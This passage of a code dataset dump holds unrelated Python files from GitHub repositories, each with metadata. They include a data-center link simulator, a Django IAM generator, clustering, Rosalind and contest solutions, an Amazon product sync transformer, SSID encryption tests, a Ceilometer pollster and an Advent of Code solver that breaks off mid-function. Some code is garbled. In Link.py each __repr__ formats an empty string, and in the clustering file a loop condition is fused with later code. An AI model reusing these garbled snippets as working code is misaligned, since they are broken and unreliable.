file.\n#read = sat_bam.fetch(\"NC_000004.12\",1,50000)\n#for x in read:\n# print(str(x))\n\n\n\n\n","repo_name":"jmfrank/sat3","sub_path":"expression/find_nearby_genes.py","file_name":"find_nearby_genes.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1735628620","text":"from Node import Node,Host,Edge,Agg,Core\nfrom SystemParameters import SystemParameters\n\nclass Link:\n \n # Characterisation of Links\n #_type=0 -> hostEdgeLink\n #_type=1 -> edgeAggLink\n #_type=2 -> aggCoreLink\n #_type=3 -> coreAggLink\n #_type=4 -> aggEdgeLink\n #_type=5 -> edgeHostLink\n def __init__(self, _id, input, output, bandwidth, _type, bufferSize = 0, delay = 0 ):\n self._id = _id\n self.input = input\n self.output = output\n self.bandwidth = bandwidth\n self._type = _type\n self.bufferSize = bufferSize\n self.delay = delay\n\n self.bandwidthUtilized = 0\n self.flowList = []\n \n def addFlow(self, flow):\n self.flowList.append(flow)\n self.bandwidthUtilized += flow.bandwidth \n \n def removeFlow(self, flow):\n self.flowList.remove(flow)\n self.bandwidthUtilized -= flow.bandwidth\n \n def __repr__(self):\n if(self._type == 0):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 1):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 2):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 3):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 4):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 5):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n 
","repo_name":"bidhovbizar/DCN-Simulation","sub_path":"PythonCode/Link.py","file_name":"Link.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6216488127","text":"from __future__ import absolute_import, unicode_literals\n\nfrom django.core.management import BaseCommand\nfrom mako.template import Template\n\nfrom auth.models.base_models import ActionConfig\n\nACTIONS_TEMP = Template(\n \"\"\"\n{\n \"system_id\": \"bk_bkdata\",\n \"operations\": [\n % for action in actions:\n {\n \"operation\": \"upsert_action\",\n \"data\": {\n \"id\": \"${action.action_id.replace('.', '-')}\",\n \"name\": \"${action.action_name}\",\n \"name_en\": \"${action.action_name_en}\",\n \"description\": \"${action.action_name}\",\n \"description_en\": \"${action.action_name_en}\",\n \"type\": \"view\",\n \"related_resource_types\": [\n {\n \"system_id\": \"bk_bkdata\",\n \"id\": \"${action.object_class.object_class}\",\n \"related_instance_selections\": [],\n \"selection_mode\": \"all\"\n }\n ],\n \"related_actions\": []\n }\n },\n % endfor\n ]\n}\n\"\"\"\n)\n\n\nclass Command(BaseCommand):\n help = \"This command is used to generate the iam configuration\"\n\n def add_arguments(self, parser):\n # Named (optional) arguments\n parser.add_argument(\"-t\", \"--target\", help=\"生成 IAM 对象,可选有 resource_type|action\")\n parser.add_argument(\"-i\", \"--typeid\", help=\"资源类型ID\")\n\n def handle(self, *args, **options):\n target = options[\"target\"]\n resource_group_id = options[\"typeid\"]\n\n if target == \"resource_group\":\n print(\"目前仅支持 target==action\")\n return\n\n iam_content = \"init....\"\n if target == \"action\":\n actions = ActionConfig.objects.filter(object_class=resource_group_id)\n iam_content = ACTIONS_TEMP.render(actions=actions)\n\n print(iam_content)\n\n def get_version(self):\n return \"1.0.0\"\n","repo_name":"Tencent/bk-base","sub_path":"src/api/auth/management/commands/generate_iam.py","file_name":"generate_iam.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"11817479793","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport statistics\n\ndata = pd.read_csv(\"agreed.csv\", sep=\",\")\na = data['s1tos2'].mean()\nb = data['s2tos1'].mean()\n\nprint(f'Mean for s1tos2: {a:.4f}')\nprint(f'Mean for s2tos1: {b:.4f}')\nam = (a+b)/2\nprint(f'Overall Mean for Agreed: {am:.4f}')\n\ns1tos2 = data['s1tos2'].tolist()\n\nres = statistics.pstdev(s1tos2)\nprint(f'Standard Deviation for Agreed: {res:.4f}')\n\nplt.figure('Agree')\nplt.title(\"Distribution of Agree\")\nplt.hist(s1tos2, 5)\nplt.show()\n\nprint(\"-----------------------\")\n\ndata = pd.read_csv(\"disagreed.csv\", sep=\",\")\na = data['s1tos2'].mean()\nb = data['s2tos1'].mean()\n\nprint(f'Mean for s1tos2: {a:.4f}')\nprint(f'Mean for s2tos1: {b:.4f}')\nam = (a+b)/2\nprint(f'Overall Mean for Disagreed: {am:.4f}')\n\ns1tos2 = data['s1tos2'].tolist()\n\nres = statistics.pstdev(s1tos2)\nprint(f'Standard Deviation for Disagreed: {res:.4f}')\n\nplt.figure('Disagree')\nplt.title(\"Distribution of Disagree\")\nplt.hist(s1tos2, 5)\nplt.show()\n","repo_name":"tushar-nitave/fake-new-classification","sub_path":"code/dm.py","file_name":"dm.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28091167411","text":"#!/usr/bin/python3\ndef 
is_prime(num):\n \"\"\"Check if a number is prime\n using primilarity test\"\"\"\n import math\n i = 2\n while (i <= math.sqrt(num)):\n if (num % i == 0):\n return False\n i += 1\n return (True)\n#print(is_prime(19))\n#print(is_prime(21))\n","repo_name":"Musoye/RSA-Factoring-Challenge","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"3466783581","text":"from sklearn.metrics import accuracy_score,f1_score,classification_report\r\nfrom sklearn.datasets import load_iris\r\nfrom scipy import spatial\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nclass AgglomerativeClustering:\r\n \r\n def __init__(self,data,label,threshold=0.99):\r\n self.data = data\r\n self.label = label\r\n self.confidence = threshold\r\n \r\n def cosine_similarity(self,list_1, list_2,epsilon=1e-7):\r\n return np.dot(list_1, list_2) / ((np.linalg.norm(list_1) * np.linalg.norm(list_2))+epsilon)\r\n \r\n def agglomerative_clustering(self):\r\n sample_idx = [] # to store each sample as singleton cluster at the starting\r\n tot_sample = len(self.data)\r\n\r\n for i in range(tot_sample):\r\n sample_idx.append([i])\r\n\r\n i = 0\r\n while i=self.confidence:\r\n group.extend(sample_idx[j])\r\n remove_idx.append(j)\r\n\r\n j+=1\r\n\r\n # club into the cluster\r\n for sample_id in group:\r\n sample_idx[i].append(sample_id)\r\n\r\n # after clubbing we need to update the number of cluster in the data\r\n # so removing those index which has been clubbed in this iteration\r\n for idx,sample_id in enumerate(remove_idx):\r\n sample_idx.pop(sample_id-idx)\r\n\r\n # updaing the length of tot_sample to avoid index error\r\n tot_sample = len(sample_idx)\r\n i+=1\r\n\r\n # if there is no improvement in total number of cluster from previous step\r\n if len(sample_idx)==prev_len:\r\n break\r\n\r\n result = np.zeros(len(self.data))\r\n for i,sample_id in enumerate(sample_idx):\r\n for idx in sample_id:\r\n result[idx]=i\r\n return result\r\n \r\n def get_result(self,cluster):\r\n print(classification_report(binary_label,cluster))\r\n\r\ndata = load_iris()\r\nsample_data = data['data']\r\nbinary_label = data['target']\r\nlabel_name = data['target_names']\r\n\r\nmodel = AgglomerativeClustering(sample_data,binary_label)\r\nresult = model.agglomerative_clustering()\r\nmodel.get_result(result)","repo_name":"Pathakvishnu/Agglomerative-Clustering-From-Scratch","sub_path":"agglomerative_clustering.py","file_name":"agglomerative_clustering.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"36814624728","text":"def lcs(strings):\n strings_number = len(strings)\n len_first_string = len(strings[0])\n\n # Main idea - try all substrings from first string and check whether it is substring for another strings\n\n for i in range(len_first_string, 0, - 1): #length of substring\n for j in range(len_first_string - i + 1): # number of symbols in substring of this length\n candidate = strings[0][j:(j+i)]\n found = [False] * (strings_number - 1) #array showing if substring is found in corresponding string\n for stringNumber in range(1, strings_number):\n found[stringNumber - 1] = strings[stringNumber].find(candidate) > 0\n if not found[stringNumber - 1]:\n break\n if all(f for f in found):\n return candidate\n\nwith open('input.txt', 'r') as input:\n # Read input into a dictionary\n inp = input.read().split()\n 
dna = dict()\n i = 0\n key = ''\n\n while i < len(inp):\n if inp[i].startswith('>'):\n key = inp[i][1:]\n dna[key] = ''\n i += 1\n else:\n dna[key] += inp[i]\n i += 1\n\n print(lcs(list(dna.values())))","repo_name":"lis-balbes/rosalind","sub_path":"LCSM.py","file_name":"LCSM.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23848835492","text":"N = int(input())\nscores = list(map(int, input().split()))\n\nmax_score = scores[0] # Aslida oxirgi raunddagi g'oliblik ma'lumotini olib tashlaymiz\npossible_winners = 1 # oxirgi g'olibni qo'lga kiritish imkoniyatini 1 bilan boshlaymiz\n\nfor i in range(1, N):\n if scores[i] < max_score: # keyingi o'quvchining balli oxirgi g'olibdan kam bo'lsa\n break # bu o'quvchi g'oliblikka erishish imkoniyati yo'q\n possible_winners += 1 # aks holda, g'oliblikka erishish imkoniyati mavjud\n\nprint(possible_winners)\n","repo_name":"Ziyodulla-Abdukarimov/cp","sub_path":"RoboContest - Robocontest Round 81 Youth Day/Masala #LOXQBETMYX.py","file_name":"Masala #LOXQBETMYX.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24335179425","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom ...model_names.shared_names import RECORD_ID_FIELD\nfrom ...model_names.product_product import (\n AMAZON_SYNC_ACTIVE_FIELD, PRODUCT_LIST_PRICE_FIELD,\n PRODUCT_VIRTUAL_AVAILABLE_FIELD,\n PRODUCT_AMAZON_IMAGE_TRIGGER_FIELD,\n)\nfrom ...model_names.product_sync import (\n SYNC_UPDATE, SYNC_PRICE, SYNC_INVENTORY,\n SYNC_IMAGE, SYNC_DEACTIVATE,\n)\nfrom ...models_access import (\n ProductSyncAccess,\n AmazonProductAccess,\n OdooProductAccess,\n ProductOperationAccess\n)\nfrom .product_create_transformer import ProductCreateTransformer\n\n_logger = logging.getLogger(__name__)\n\n\nclass ProductWriteTransformer(object):\n def __init__(self, env):\n self._env = env\n self._product_sync = ProductSyncAccess(env)\n self._amazon_product = AmazonProductAccess(env)\n self._odoo_product = OdooProductAccess(env)\n\n self._current_amazon_product = None\n\n def _get_creation_status(self, amazon_product):\n waiting_flag = False\n error_flag = False\n if self._amazon_product.is_waiting(amazon_product):\n waiting_flag = True\n elif self._amazon_product.is_error(amazon_product):\n error_flag = True\n\n return waiting_flag, error_flag\n\n def _insert_sync_operation(self, operation, sync_type,\n write_field_names=None):\n\n waiting_flag, error_flag = self._get_creation_status(\n self._current_amazon_product)\n self._product_sync.insert_sync(\n operation, sync_type,\n write_field_names=write_field_names,\n waiting_flag=waiting_flag,\n error_flag=error_flag)\n\n def _add_sync_price(self, operation):\n variants = self._amazon_product.get_variants(\n operation[RECORD_ID_FIELD])\n if variants:\n # because we always create the template with a variant,\n # we are sure a multi-variant template has at least one\n # variant record\n for variant in variants:\n self._insert_sync_operation(variant, SYNC_PRICE)\n else:\n self._insert_sync_operation(operation, SYNC_PRICE)\n\n def _transform_price(self, operation, values):\n # we don't handle the extra price change in attribute line\n # List price is only stored in template, however,\n # it can be changed in template and variant and\n # both generate write operations.\n if PRODUCT_LIST_PRICE_FIELD in values:\n values.remove(PRODUCT_LIST_PRICE_FIELD)\n if 
ProductOperationAccess.is_product_template(operation):\n self._add_sync_price(operation)\n else:\n _logger.debug('Skip variant {} list_price write.'.format(\n operation[RECORD_ID_FIELD]))\n\n def _transform_inventory(self, operation, values):\n # the inventory is only stored in single-variant template\n # or non-partial variant, no need to skip any inventory update\n if PRODUCT_VIRTUAL_AVAILABLE_FIELD in values:\n values.remove(PRODUCT_VIRTUAL_AVAILABLE_FIELD)\n self._insert_sync_operation(operation, SYNC_INVENTORY)\n\n def _transform_image(self, operation, values):\n # create image sync regardless the image_trigger value\n # only for non-partial variant or single-variant template\n if PRODUCT_AMAZON_IMAGE_TRIGGER_FIELD in values:\n values.remove(PRODUCT_AMAZON_IMAGE_TRIGGER_FIELD)\n if self._odoo_product.is_partial_variant_multi_template(\n operation):\n _logger.debug(\"ignore image operation for a partial variant \"\n \"or multi-variant template.\")\n else:\n self._insert_sync_operation(operation, SYNC_IMAGE)\n\n def _transform_update(self, operation, write_fields):\n self._transform_price(operation, write_fields)\n self._transform_inventory(operation, write_fields)\n self._transform_image(operation, write_fields)\n if write_fields:\n if ProductOperationAccess.is_product_template(operation):\n self._insert_sync_operation(\n operation, SYNC_UPDATE, write_fields)\n else:\n _logger.debug(\"Ignore write operation because it is a \"\n \"product variant.\")\n\n def _transform_deactivate(self, operation):\n if self._odoo_product.is_partial_variant_multi_template(\n operation):\n _logger.debug(\"ignore deactivate operation for a partial variant \"\n \"or multi-variant template.\")\n else:\n self._insert_sync_operation(operation, SYNC_DEACTIVATE)\n\n def _transform_sync_active(self, operation, sync_active_value):\n if sync_active_value:\n _logger.debug(\"Amazon sync active flag changes to True,\"\n \"Call create transformer for create sync.\")\n create_transformer = ProductCreateTransformer(self._env)\n create_transformer.transform(operation)\n else:\n if AmazonProductAccess.is_sync_enabled(\n self._current_amazon_product):\n _logger.debug(\"Amazon sync active flag changes to \"\n \"False, generate a deactivate sync.\")\n self._transform_deactivate(operation)\n else:\n _logger.debug(\"Product is not created in Amazon. \"\n \"Ignore deactivate sync.\")\n\n def transform(self, operation, write_fields):\n \"\"\"\n transform a write operation to one or more sync operations\n 1. If sync active value changes, generate create or deactivate sync.\n 2. If product sync active is False, ignore all changes.\n 3. If price, inventory or image change, generate\n corresponding syncs.\n 4. If there are other write values, generate an update sync.\n\n deactivate, price, inventory and image can happen in both a template\n and its variant(s), need to deal with them case by case.\n Update syncs are only for product template, there is no need\n to update a variant field.\n\n !!! 
sync initial status could be New (default), Waiting or Error\n a product Amazon creation might be waiting or error.\n When a new product creation is waiting, all changes\n except creation are put into waiting status.\n When the creation status is error, create a sync operation and set\n its status as Error and DONE.\n \"\"\"\n\n self._current_amazon_product = self._amazon_product.search_by_head(\n operation)\n sync_active_value = self._odoo_product.is_sync_active(operation)\n if AMAZON_SYNC_ACTIVE_FIELD in write_fields:\n # sync active is in the write field, use the\n # latest value to create sync operation\n self._transform_sync_active(operation, sync_active_value)\n else:\n if sync_active_value:\n if AmazonProductAccess.is_sync_enabled(\n self._current_amazon_product):\n # we change the local copy in other methods\n values_copy = write_fields.copy()\n self._transform_update(operation, values_copy)\n else:\n _logger.debug(\"Product is not created in Amazon. \"\n \"Ignore write operation.\")\n else:\n _logger.debug(\"Product sync flag is disabled. Ignore writes.\")\n","repo_name":"amdeb/amdeb-amazon","sub_path":"amdeb_amazon/mws/product_operation_transform/product_write_transformer.py","file_name":"product_write_transformer.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"73975548200","text":"import spacy\n\nfrom reviews.features import (\n length,\n unigrams_frequency,\n alliteration,\n letters_to_others\n)\n\nnlp = spacy.load(\"en_core_web_sm\", disable=['ner', 'textcat'])\n\n\ndef test_length():\n doc = nlp('12345')\n assert length(doc) == 5\n\n\ndef test_unigrams_frequency():\n corpus = ('Cat is in the room', 'Room is a big room')\n\n def reviews_reader():\n return ({'text': review} for review in corpus)\n\n frequency = unigrams_frequency(reviews_reader)\n assert 2 in frequency[1] # room\n assert 2 not in frequency[0]\n\n\ndef test_alliteration():\n doc = nlp(\"Infant's don't enjoy infancy, like adults do adultery. 
\"\n \"The love belongs to those who belove.\")\n assert alliteration(doc) == 5\n\n\ndef test_letters_to_others():\n assert letters_to_others(nlp('12345')) == 0.0\n assert letters_to_others(nlp('A b ')) == 1.0\n\n","repo_name":"dzieciou/funny-reviews","sub_path":"test/reviews/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25966713015","text":"import unittest\n\nimport secu\n\nclass TestSecuMethods(unittest.TestCase):\n\n def test_xor(self):\n \"\"\"\n Test de la function xor\n \"\"\"\n self.assertEqual(secu.xor('0','0'), '0')\n self.assertEqual(secu.xor('0','1'), '1')\n self.assertEqual(secu.xor('1','0'), '1')\n self.assertEqual(secu.xor('1','1'), '0')\n \n def test_encrypt(self):\n \"\"\"\n Test de la function encrypt\n \"\"\"\n self.assertEqual(secu.encrypt('1110011','10'),'0100110')\n\n def test_to_bin(self):\n \"\"\"\n Test de la function to_bin\n \"\"\"\n self.assertEqual(secu.to_bin('0123'),'0000000100100011')\n\n def test_is_valid_ssid(self):\n \"\"\"\n Test de la function is_valid_ssid\n \"\"\"\n self.assertTrue(secu.is_valid_ssid('255081416802538'))\n self.assertFalse(secu.is_valid_ssid('255081468025455'))\n self.assertFalse(secu.is_valid_ssid('25508146802545'))\n\n def test_decode(self):\n \"\"\"\n Test de la fonction decode\n \"\"\"\n encoded = \"101011110101101101111101110111111000001010101101001111111010\"\n indice = '1980106'\n ssid,key = secu.decode(encoded,indice)\n self.assertEqual(ssid, \"198010623476521\")\n self.assertEqual(key,\"10110110110110110110110110111101\")\n\n def test_gen_key(self):\n \"\"\"\n Test de la fonction gen_key\n \"\"\"\n key = secu.gen_key()\n self.assertEqual(len(key),8)\n\n def test_gen_ssid(self):\n \"\"\"\n Test de la fonction gen_ssid\n \"\"\"\n ssid , err = secu.gen_ssid()\n if err != None:\n self.assertTrue(False)\n self.assertTrue(secu.is_valid_ssid(ssid))\n\n def test_process(self):\n \"\"\"\n Test du process sur une centaine de cas tirés au hasard \n \"\"\"\n # iteration sur 100 cas\n for i in range(100):\n # tirage aleatoire d'un ssid\n key = str(secu.gen_key())\n # tirage aleatoire d'une clé\n ssid,err = secu.gen_ssid()\n if err == None :\n # codeage du ssid avec la clé\n encoded = secu.encrypt(secu.to_bin(str(ssid)),secu.to_bin(key))\n # decodage de la chaine encode à apartir d'un indice(7 premier chiffre du ssid)\n ssid2, key2 = secu.decode(str(encoded),str(ssid[0:7]))\n # verification du ssid calculé\n self.assertEqual(ssid,ssid2)\n # verification de la clé calculé\n self.assertEqual(secu.to_bin(key),key2)\n print(\"test \", i, \"ssid:\",ssid, \"key:\", key,\"key en binaire:\", secu.to_bin(key), \"chaine encodée:\",encoded, \"indice:\", str(ssid[0:7]), \"ssid calculé:\", ssid2, \"clé calculée:\", key2 )\n else:\n print(\"erreur dans la generation du ssid \",ssid)\n self.assertTrue(True)\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"jtarte/sample_python_apps","sub_path":"secu_test.py","file_name":"secu_test.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70114537641","text":"#\n# https://leetcode.com/problems/binary-search-tree-iterator/\n#\n# Implement the BSTIterator class that represents an iterator \n# over the in-order traversal of a binary search tree (BST):.\n# \n\nfrom typing import List\nimport sys\nimport pdb\nbr = pdb.set_trace\n\nsolution_json = {\n 
\"date\": \"2022/10/7\",\n \"design\": 0,\n \"coding\": 0,\n \"runtime\": \"178 ms\",\n \"fasterThan\": \"14%\",\n \"memory\": \"20 MB\" \n}\n\nclass Solution:\n def __init__(self):\n self.module = sys.modules[__name__]\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n'''\n 7\n 3 15\n 9 20\n'''\nclass BSTIterator:\n\n def __init__(self, root: TreeNode):\n self.v_ls = []\n go(root, self.v_ls) \n\n def next(self) -> int:\n return self.v_ls.pop(0)\n\n def hasNext(self) -> bool:\n return self.v_ls != []\n\n def dump(self):\n print(self.v_ls)\n\ndef go(nd, v_ls):\n if nd == None:\n return\n \n go(nd.left, v_ls)\n #print(nd.val)\n v_ls.append(nd.val)\n go(nd.right, v_ls)\n\n#\n# Your BSTIterator object will be instantiated and called as such:\n# obj = BSTIterator(root)\n# param_1 = obj.next()\n# param_2 = obj.hasNext() \n#\n\n\n\n\n\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_15_binary_search_tree/solutions/0173-bst-iter-s2.py","file_name":"0173-bst-iter-s2.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43932666087","text":"\nimport ceilometer\nfrom ceilometer.compute import plugin\nfrom ceilometer.compute.pollsters import util\nfrom ceilometer.compute.virt import inspector as virt_inspector\nfrom ceilometer.openstack.common.gettextutils import _\nfrom ceilometer.openstack.common import log\nfrom ceilometer import sample\n\nLOG = log.getLogger(__name__)\n\n\nclass AllocatedMemoryPollster(plugin.ComputePollster):\n\n def get_samples(self, manager, cache, resources):\n for instance in resources:\n LOG.debug(_('Checking allocated memory for instance %s'), instance.id)\n try:\n memory_info = manager.inspector.inspect_allocated_memory(\n instance)\n LOG.debug(_(\"ALLOCATED MEMORY: %(instance)s %(allocated)f\"),\n ({'instance': instance.__dict__,\n 'allocated': memory_info.allocated}))\n yield util.make_sample_from_instance(\n instance,\n name='memory.allocated',\n type=sample.TYPE_GAUGE,\n unit='MB',\n volume=memory_info.allocated,\n )\n except virt_inspector.InstanceNotFoundException as err:\n # Instance was deleted while getting samples. 
Ignore it.\n LOG.debug(_('Exception while getting samples %s'), err)\n except ceilometer.NotImplementedError:\n # Selected inspector does not implement this pollster.\n LOG.debug(_('Obtaining Allocated Memory is not implemented for %s'\n ), manager.inspector.__class__.__name__)\n except Exception as err:\n LOG.exception(_('Could not get Allocated Memory for '\n '%(id)s: %(e)s'), {'id': instance.id,\n 'e': err})\n","repo_name":"MisterPup/Ceilometer-Juno-Extension","sub_path":"ceilometer/compute/pollsters/allocated_memory.py","file_name":"allocated_memory.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"42098734473","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .form import RegistrationForm\n\n\n\ndef register (request):\n if request.method =='POST':\n form = RegistrationForm(request.POST)\n if form.is_valid(): \n form.save()\n messages.success(request, f'Account Created Successfully')\n return redirect(\"estateapp-home\")\n else:\n form = RegistrationForm()\n return render(request, 'register/form.html', {'form': form})\n","repo_name":"nseudondian/estateapp","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6553313709","text":"# bottom-up\nn = int(input())\ndp = [0 for x in range(n+1)]\n\nfor i in range(2, n+1):\n dp[i] = dp[i - 1] + 1\n if i % 2 == 0:\n dp[i] = min(dp[i], dp[i // 2] + 1)\n if i % 3 == 0:\n dp[i] = min(dp[i], dp[i // 3] + 1)\n\nprint(dp[n])\n\n\n# top-down(but, runtime error)\n\nimport sys\nsys.setrecursionlimit(100000000)\n\nn = int(input())\ndp = [None for x in range(n+1)]\ndp[0] = 0\ndp[1] = 0\n\n\ndef calc_dp(i):\n if dp[i] is None:\n dp[i] = calc_dp(i - 1) + 1\n if i % 2 == 0:\n dp[i] = min(dp[i], calc_dp(i // 2) + 1)\n if i % 3 == 0:\n dp[i] = min(dp[i], calc_dp(i // 3) + 1)\n\n return dp[i]\n\n\nprint(calc_dp(n))\n\n\n\n\n\n\n# dp = [0,0] # 시작 위치는 0,0으로 설정, 동전 문제 푸는 것과 유사하게 접근함\n#\n# n = int(input())\n#\n# for i in range(2,n+1): # 2부터 n 까지 수열 정리\n# temp = []\n# temp.append(dp[i-1]+1) # 1차이는 무조건 되니까 넣고\n# if i % 2 == 0:\n# temp.append(dp[i//2]+1) # 2로 나누어 떨어지는지는 확인\n# if i % 3 == 0:\n# temp.append(dp[i//3]+1) # 3으로 나누어 떨어지는지도 확인\n# dp.append(min(temp)) # 그 중 최소값\n# print(dp[n]) # n번째 출력\n\n'''\n참고한 코드\n\na = int(input())\ncount = 0\nminimum=[a]\ndef cal(a):\n list = []\n for i in a:\n list.append(i-1)\n if i%3 == 0:\n list.append(i/3)\n if i%2 == 0:\n list.append(i/2)\n return list\n \nwhile True:\n if a == 1:\n print(count)\n break\n \n temp = minimum[:]\n minimum = []\n minimum = cal(temp)\n count +=1\n if min(minimum) == 1:\n print(count)\n break\n'''","repo_name":"timetobye/BOJ_Solution","sub_path":"problem_solve_result/1463.py","file_name":"1463.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"36367947538","text":"\"\"\"\nSearch Puzzle\n\"\"\"\n\nimport time\n\nimport numpy as np\nfrom aocd.models import Puzzle\nfrom matplotlib import pyplot as plt\n\nDAY = 12\nYEAR = 2022\n\nPosition = tuple[int, int]\n\n\ndef main():\n puzzle = Puzzle(year=YEAR, day=DAY)\n puzzle.answer_a = solve_a(puzzle.input_data)\n puzzle.answer_b = solve_b(puzzle.input_data)\n\n\ndef parse_input(\n puzzle_input: str, verbose: bool = False\n) -> tuple[Position, Position, 
np.ndarray]:\n \"\"\"\n Example:\n Sabqponm\n abcryxxl\n accszExk\n acctuvwj\n abdefghi\n\n Convert letters to numbers, with a=0, b=1, c=2, etc.\n 'S' marks the start, 'E' marks the goal.\n The starting position 'S' has elevation 'a', and the goal 'E' has elevation 'z'.\n Return numpy int array of height map and indices of start and goal.\n \"\"\"\n # first parse input as string array\n height_map = np.array([list(line.strip()) for line in puzzle_input.splitlines()])\n # find start and goal\n start = np.argwhere(height_map == \"S\")[0]\n goal = np.argwhere(height_map == \"E\")[0]\n # replace start and goal with 'a' and 'z'\n height_map[start[0], start[1]] = \"a\"\n height_map[goal[0], goal[1]] = \"z\"\n # convert letters to numbers\n height_map = np.vectorize(lambda x: ord(x) - ord(\"a\"))(height_map)\n if verbose:\n print(\"Start:\", start)\n print(\"Goal:\", goal)\n print(\"Size:\", height_map.shape)\n print(\"Height map:\")\n print(height_map)\n # convert start and goal to tuples\n start = tuple(start.tolist())\n goal = tuple(goal.tolist())\n return start, goal, height_map\n\n\ndef get_neighbors(current: Position, height_map: np.ndarray) -> list[Position]:\n \"\"\"\n During each step, you can move exactly one square up, down, left, or right.\n You cannot move diagonally.\n You can only move to a square with a height that is at most 1 higher than your current height.\n \"\"\"\n neighbors = []\n # get all possible neighbors\n # this includes neighbors outside of the height map\n # these neighbors are filtered out later\n for i in range(-1, 2):\n for j in range(-1, 2):\n # skip if current position\n if i == 0 and j == 0:\n continue\n # skip if diagonal\n if abs(i) == abs(j):\n continue\n # add neighbor to list\n neighbors.append(current + np.array([i, j]))\n # turn list of numpy arrays into list of tuples\n neighbors = [tuple(neighbor.tolist()) for neighbor in neighbors]\n # filter out neighbors with invalid indices\n neighbors = [\n neighbor\n for neighbor in neighbors\n if 0 <= neighbor[0] < height_map.shape[0] # check row index\n and 0 <= neighbor[1] < height_map.shape[1] # check column index\n ]\n # filter out neighbors with invalid height\n neighbors = [\n neighbor\n for neighbor in neighbors\n if height_map[neighbor] - height_map[current] <= 1\n ]\n return neighbors\n\n\ndef plot_path(\n name, height_map: np.ndarray, path: list, start: Position, goal: Position\n):\n # provide some plot maze and path\n plt.imshow(height_map, cmap=\"gray\")\n # plot start and goal as red and green dots\n plt.plot(start[1], start[0], \"ro\")\n plt.plot(goal[1], goal[0], \"go\")\n # plot path as blue line\n plt.plot([p[1] for p in path], [p[0] for p in path], \"b-\")\n # save plot as {name}.png\n plt.savefig(f\"{name}.png\")\n # close plot\n plt.close()\n\n\ndef path_throguh_map(\n start: Position,\n goal: Position,\n height_map: np.ndarray,\n visualize: bool = False,\n) -> tuple[int, list]:\n \"\"\"\n Return the shortest path from start to goal through the height map.\n Use BFS to find the shortest path.\n \"\"\"\n # initialize queue\n queue = [(start, 0, [start])]\n # keep track of visited nodes\n visited = set()\n # give some progress information\n print(\"Start search...\")\n while queue:\n # pop first element from queue\n # current: current position\n # distance: distance from start to current\n # path: list of positions from start to current\n # pop(0) is used instead of pop() to implement breadth-first search\n current, distance, path = queue.pop(0)\n # give some progress information about current 
